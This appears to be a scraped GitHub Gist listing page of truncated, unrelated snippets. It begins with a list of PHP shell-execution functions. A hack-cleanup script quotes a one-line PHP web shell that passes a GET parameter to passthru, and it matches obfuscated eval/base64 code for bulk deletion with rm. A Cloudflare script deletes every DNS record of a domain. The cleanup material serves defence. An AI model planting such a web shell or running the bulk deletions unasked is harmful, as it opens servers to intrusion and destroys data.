exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
Emil Stahl emilstahl
fedir
/ cleaning.sh
Last active
February 4, 2022 19:33
Traces of one hack and solutions for cleaning after it
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| find . -type f -iname '*.php' -exec sed -i 's/<?php if (isset(\$_GET\["_cmd"\])) die(passthru(\$_GET\["_cmd"\])); ?>//g' "{}" +; | |
| find . -iname 'index.php' | xargs grep '\x2fhom' | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep '\x2fh' | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep 'eval("' | grep 337 | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep '\{eval(' | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep '$_COOKIE;' | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep 'create_function'|grep base64_decode| cut -f1 -d":"| xargs rm |
kylef
/ cloudflare_delete.py
Created
April 2, 2015 21:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| """ | |
| Simple script to delete every dns entry for a cloudflare domain. | |
| Depends on requests (pip install requests). Then fill in the | |
| following three variables: | |
| """ | |
| token = 'INSERT API TOKEN' |
tfausak
/ ios-8-web-app.html
Last active
March 16, 2025 16:49
iOS 8 web app http://taylor.fausak.me/2015/01/27/ios-8-web-apps/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <!-- http://taylor.fausak.me/2015/01/27/ios-8-web-apps/ --> | |
| <html> | |
| <head> | |
| <title>iOS 8 web app</title> | |
| <!-- CONFIGURATION --> |
jtai
/ parse-tcpdump-udp-port-53.php
Last active
January 16, 2019 16:06
Quick and dirty script to parse output of /usr/sbin/tcpdump -vvv -s 0 -l port 53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // quick and dirty argument parsing | |
| foreach ($argv as $arg) { | |
| if ($arg == '-f') { | |
| define('FOLLOW', true); | |
| } | |
| if ($arg == '-h') { | |
| define('HISTOGRAM', true); | |
| } |